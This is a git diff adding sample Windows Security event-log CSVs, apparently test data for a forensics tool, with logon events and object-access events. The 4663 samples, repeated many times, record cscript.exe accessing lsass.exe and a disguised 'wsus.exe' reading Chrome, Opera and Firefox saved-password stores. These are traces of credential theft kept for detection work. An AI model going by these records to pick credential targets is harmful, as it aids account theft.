+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x820d61
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63640
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"
+
+
+
+
+ 4624
+ 1
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 25049
+
+
+
+
+ Security
+ alice.insecurebank.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x1d12916
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 127.0.0.1
+ 59336
+ %%1833
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171296
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aadb8
+ 3
+ Kerberos
+ Kerberos
+ -
+ 860D1189-6C67-C57B-59ED-C0676A052019
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62863
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171295
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aad4a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 860D1189-6C67-C57B-59ED-C0676A052019
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62862
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171294
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x21aa47f
+ 3
+ Kerberos
+ Kerberos
+ -
+ 27FCE179-F80F-F6A6-7DF4-C247E783B072
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 62860
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171292
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ THREEBEESCO.COM
+ 0x21a8c9a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 467413FE-B054-D9AE-C758-B41105A3ECA9
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.142
+ 60726
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171291
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ THREEBEESCO.COM
+ 0x21a8c80
+ 3
+ Kerberos
+ Kerberos
+ -
+ 467413FE-B054-D9AE-C758-B41105A3ECA9
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.142
+ 60728
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2171290
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x21a8c68
+ 3
+ NtLmSsp
+ NTLM
+ 04246W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.142
+ 60726
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
diff --git a/source/samples/Sample_Object_Access_Events.csv b/source/samples/Sample_Object_Access_Events.csv
new file mode 100644
index 0000000..01dbd53
--- /dev/null
+++ b/source/samples/Sample_Object_Access_Events.csv
@@ -0,0 +1,14715 @@
+Date and Time,timestamp,Event ID,Account Name,Object Name,Object Type,Process Name,Computer Name,Channel,Original Event Log
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452905
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
